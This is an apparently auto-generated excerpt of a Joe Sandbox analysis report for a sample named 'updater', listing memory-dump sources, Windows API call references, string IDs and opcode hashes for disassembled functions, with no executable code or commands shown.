                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLastProcess_free$CurrentFeatureInfoLocalePresentProcessorTerminate
                                    • String ID:
                                    • API String ID: 4283097504-0
                                    • Opcode ID: 9ee5f7f98cdb552c601273d9858fcd9381198ccc73d67d83a3e8e6d5815ac4d6
                                    • Instruction ID: 9479b3be793f4ab6928b174181c9cb9f460ebaf25fbae6be6baa4c653dea1ed8
                                    • Opcode Fuzzy Hash: 9ee5f7f98cdb552c601273d9858fcd9381198ccc73d67d83a3e8e6d5815ac4d6
                                    • Instruction Fuzzy Hash: E0B105755003128BDB359A29CC91AB7B3E8EF50308FA4446EDE87C7A61EB74E5C68B10
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalCurrentEnterSectionThread
                                    • String ID:
                                    • API String ID: 3488303727-0
                                    • Opcode ID: 40bc18dd9853e0603fdaa9c5c8a53828e9fba5b14cc560dec0985f00115aba6f
                                    • Instruction ID: 9df6043f1521a45581c29740eb87788c70b06eaa139fddc4e2d47d530acfa6ba
                                    • Opcode Fuzzy Hash: 40bc18dd9853e0603fdaa9c5c8a53828e9fba5b14cc560dec0985f00115aba6f
                                    • Instruction Fuzzy Hash: 15B1E671B043529FDB24DF2CD484B6ABBE5BF84718F04852DE9869B391DB30E845CB92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ae50731e5f2768dbf173af61d2db561e0aff04396bb3e814e0b1d0d8e45e247c
                                    • Instruction ID: 3486a6439eeadb9509ae052d0b024a689e196f057afaaebe8ae7b2c51d4e150b
                                    • Opcode Fuzzy Hash: ae50731e5f2768dbf173af61d2db561e0aff04396bb3e814e0b1d0d8e45e247c
                                    • Instruction Fuzzy Hash: A5517271E0011AEFDF05CF99C980AAEBBB2EF88300F19806DE515AB355D7359E51CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 343129a808a60ef9b6d5979a0bbd1374011e7430ea1edd7c28fe48b61a52bac6
                                    • Instruction ID: cc42e10a0d53c9894fab824a83b24d491ce23b664001472062d4a980b973ce69
                                    • Opcode Fuzzy Hash: 343129a808a60ef9b6d5979a0bbd1374011e7430ea1edd7c28fe48b61a52bac6
                                    • Instruction Fuzzy Hash: 4021B373F205394B7B0CC47E8C532BDB6E1C78C641745823AF8A6EA2C1D968D917E2E4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 21ed3eed4962f88ab9b7fd60c1589db3cafdf35f6e5c584bf46cf2c751d7f1dd
                                    • Instruction ID: af3dfb2b4890cdd9021c45a81d09690ac7d211d7b84a2dc2906976dab9fbf6e3
                                    • Opcode Fuzzy Hash: 21ed3eed4962f88ab9b7fd60c1589db3cafdf35f6e5c584bf46cf2c751d7f1dd
                                    • Instruction Fuzzy Hash: 76117363F30C255A675C816A8C172BAA5D2EBD825074F533BD826E7384E9A4DE23D290
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                    • Instruction ID: 7ca771a036b871646cd3d74429a4ca5d8f3af78ec322649894cb4c84b28c669f
                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                    • Instruction Fuzzy Hash: 8E110BB770118143E6148A3DC9B66BBDF95EAC5221B2D4277F3424BB7CD272D185A900
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 58dd59d11c31016f2ed846ab868ddea041b11fab4c947be6458138c07cc6c13d
                                    • Instruction ID: 035a618a5a9f929fb9f6649c5659e9464b2c8b6cca09cc2e623191b78b0de456
                                    • Opcode Fuzzy Hash: 58dd59d11c31016f2ed846ab868ddea041b11fab4c947be6458138c07cc6c13d
                                    • Instruction Fuzzy Hash: 5C2154705250B10ACB5D863AA862536BF90DBC720238F42ABEBCBE94C6C539D121D7E0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0140CEAE
                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0140CEBC
                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0140CECD
                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0140CEDE
                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0140CEEF
                                    • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0140CF00
                                    • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 0140CF11
                                    • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0140CF22
                                    • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 0140CF33
                                    • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0140CF44
                                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0140CF55
                                    • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0140CF66
                                    • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0140CF77
                                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0140CF88
                                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0140CF99
                                    • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0140CFAA
                                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0140CFBB
                                    • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0140CFCC
                                    • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 0140CFDD
                                    • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 0140CFEE
                                    • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 0140CFFF
                                    • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 0140D010
                                    • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 0140D021
                                    • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 0140D032
                                    • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 0140D043
                                    • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 0140D054
                                    • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0140D065
                                    • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 0140D076
                                    • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0140D087
                                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0140D098
                                    • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 0140D0A9
                                    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0140D0BA
                                    • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 0140D0CB
                                    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0140D0DC
                                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 0140D0ED
                                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 0140D0FE
                                    • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 0140D10F
                                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 0140D120
                                    • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 0140D131
                                    • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 0140D142
                                    • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 0140D153
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$HandleModule
                                    • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                    • API String ID: 667068680-295688737
                                    • Opcode ID: a0db52fea9f806f0aa0490ea486e98aec7284e29cce65e9da28f5592e7d86c2c
                                    • Instruction ID: db6f24b10ea93d7098b96ef86a915770b2f4edd8d43a49d250a075b48fc9c875
                                    • Opcode Fuzzy Hash: a0db52fea9f806f0aa0490ea486e98aec7284e29cce65e9da28f5592e7d86c2c
                                    • Instruction Fuzzy Hash: 6461DCF6941761BBD3319FB6F84E88ABAB8BB4C743310050BF255C217ADBB580849F50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • collate.LIBCPMT ref: 0140AC9A
                                      • Part of subcall function 014099C6: __EH_prolog3_GS.LIBCMT ref: 014099CD
                                      • Part of subcall function 014099C6: __Getcoll.LIBCPMT ref: 01409A31
                                    • __Getcoll.LIBCPMT ref: 0140ACE0
                                    • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0140ACF4
                                    • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0140AD09
                                    • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0140AD5A
                                    • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0140AE8F
                                    • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0140AEA2
                                    • int.LIBCPMT ref: 0140AEAF
                                    • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0140AEBF
                                    • int.LIBCPMT ref: 0140AECC
                                    • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0140AEDC
                                    • int.LIBCPMT ref: 0140AEE9
                                    • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0140AEF9
                                    • int.LIBCPMT ref: 0140ACBA
                                      • Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
                                      • Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862
                                    • int.LIBCPMT ref: 0140AD1D
                                    • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0140AD47
                                    • int.LIBCPMT ref: 0140AD72
                                    • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0140ADA0
                                    • int.LIBCPMT ref: 0140ADAD
                                    • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0140ADD4
                                    • int.LIBCPMT ref: 0140ADE1
                                    • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0140AE31
                                    • int.LIBCPMT ref: 0140AE3E
                                    • int.LIBCPMT ref: 0140AF11
                                    • numpunct.LIBCPMT ref: 0140AF38
                                    • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0140AF48
                                    • int.LIBCPMT ref: 0140AF55
                                    • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0140AF8C
                                    • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0140AF9F
                                    • int.LIBCPMT ref: 0140AFAC
                                    • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 0140AFBC
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddfacLocimp::_Locimp_std::locale::_$GetcollLockitstd::_$H_prolog3_Lockit::_Lockit::~_collatenumpunct
                                    • String ID:
                                    • API String ID: 4289308570-0
                                    • Opcode ID: ada5920da3f550dea45ea34b3d04d7cb4dd06dee2a69c35d828b1e0c4e7dabfe
                                    • Instruction ID: 16dc1e2179519862427654d416aba98937a61dc9c7acaf16c2c8aafdaaacdea0
                                    • Opcode Fuzzy Hash: ada5920da3f550dea45ea34b3d04d7cb4dd06dee2a69c35d828b1e0c4e7dabfe
                                    • Instruction Fuzzy Hash: 2591E7B1D013136BE7566FBB4C44A7FBAA4FF71654F14452EFA4DA72E1EA30890082A1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$Info
                                    • String ID:
                                    • API String ID: 2509303402-0
                                    • Opcode ID: eff325af69f1a7633f172cc6b6f5a81cc1c3ca65845c97e37387734d14ff534e
                                    • Instruction ID: 9832b08c1a0e1aed228f7e8ce155c8404fcdb71865625283f306788a7a9f42b6
                                    • Opcode Fuzzy Hash: eff325af69f1a7633f172cc6b6f5a81cc1c3ca65845c97e37387734d14ff534e
                                    • Instruction Fuzzy Hash: 35D1DE71D003169FEB21CFA9C880BAEBBF5FF18300F54406EE595A73A5DBB5A9418B50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _strlen.LIBCMT ref: 013E99FA
                                      • Part of subcall function 013EDA52: _strlen.LIBCMT ref: 013EDB9D
                                      • Part of subcall function 013E88F3: _strlen.LIBCMT ref: 013E8929
                                    • _strlen.LIBCMT ref: 013E9A37
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _strlen
                                    • String ID: CREATE %s %.*s$CREATE TABLE %Q.sqlite_sequence(name,seq)$TABLE$UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d$VIEW$sqlite_master$sqlite_temp_master$tbl_name='%q'$view
                                    • API String ID: 4218353326-3984390951
                                    • Opcode ID: 5022bc8dc97d572e2c7dbbe0701f267e17ccfcda40d0cddbc548fe62f7c41662
                                    • Instruction ID: e24cec038a038d48a09e7577e29816f626261e4ec7c7d72802c24b3a443a45bb
                                    • Opcode Fuzzy Hash: 5022bc8dc97d572e2c7dbbe0701f267e17ccfcda40d0cddbc548fe62f7c41662
                                    • Instruction Fuzzy Hash: 62B19E70A00316AFEF14DFA8D884BAEBBF5FF44308F10815DE909AB281D771A944CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: a47d74ab5b98f03490607271375902689e914a9a21c838d0f4a82d3a1352f2d3
                                    • Instruction ID: 574da1d825a1c90974353c8e5845178c06173b5c9e90f76d630524fd79e1b68a
                                    • Opcode Fuzzy Hash: a47d74ab5b98f03490607271375902689e914a9a21c838d0f4a82d3a1352f2d3
                                    • Instruction Fuzzy Hash: 9DC14572D41225AFDB20DBA9DC86FEE77F8EF28704F54016AFA04EB291D6709D818750
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _strlen
                                    • String ID: %.16g$%lld$%s(%d)$,...$,nil$collseq(%.20s)$keyinfo(%d$vtab:%p:%p
                                    • API String ID: 4218353326-1567635944
                                    • Opcode ID: 8db8d33a4992a44d4d34ba9343a2fc74234d5ae46f288ca6adc1257ca2883746
                                    • Instruction ID: 53ed0fd8025a337be43a182803f9826f366c377d31615652d71bf856ad46b5f5
                                    • Opcode Fuzzy Hash: 8db8d33a4992a44d4d34ba9343a2fc74234d5ae46f288ca6adc1257ca2883746
                                    • Instruction Fuzzy Hash: E2510472900605AFEB15CFEDE880E6A7BB4BF4532CF24429AE5119F2E2D731D942CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetFileInformationByHandle.KERNEL32(?,?), ref: 013B7535
                                    • GetFileSize.KERNEL32(?,00000000,?,?), ref: 013B75B5
                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 013B75CC
                                    • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 013B75DF
                                    • SetFilePointer.KERNEL32(?,00000024,00000000,00000000,?,?), ref: 013B75EC
                                    • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 013B75FF
                                    • SetFilePointer.KERNEL32(?,?,00000000,00000000,?,?), ref: 013B7620
                                    • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 013B7633
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$PointerRead$HandleInformationSize
                                    • String ID:
                                    • API String ID: 2979504256-0
                                    • Opcode ID: 15060bc7f69422e1472d6cd784dda5fd10b1ce3db857315551876cb88dbe62f4
                                    • Instruction ID: aa9c53b73fcdba36f94f23bbdde107007f0eee6495c859b1828d136cbe1b1b01
                                    • Opcode Fuzzy Hash: 15060bc7f69422e1472d6cd784dda5fd10b1ce3db857315551876cb88dbe62f4
                                    • Instruction Fuzzy Hash: 305164B5A00219BFEB24DE68DC81FBEB7F9EB84714F104529FA45E7280E630DD008B60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 014114EB
                                    • type_info::operator==.LIBVCRUNTIME ref: 01411512
                                    • ___TypeMatch.LIBVCRUNTIME ref: 0141161E
                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 014116F9
                                    • _UnwindNestedFrames.LIBCMT ref: 01411780
                                    • CallUnexpected.LIBVCRUNTIME ref: 0141179B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                    • String ID: csm$csm$csm
                                    • API String ID: 2123188842-393685449
                                    • Opcode ID: 403eaa091ceed871cab725fe7f5a3ff7378107f9e00de8aebcd9689b2a3acf29
                                    • Instruction ID: b0af0003ae8d21e9cd72ac6acdcb6e97ecf4040e6a2f41f54535f64079eb0626
                                    • Opcode Fuzzy Hash: 403eaa091ceed871cab725fe7f5a3ff7378107f9e00de8aebcd9689b2a3acf29
                                    • Instruction Fuzzy Hash: B3C18871D0020A9FCF26DFA9D9809AFBBB4AF14B10F04445BEA156B32AD331D952CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
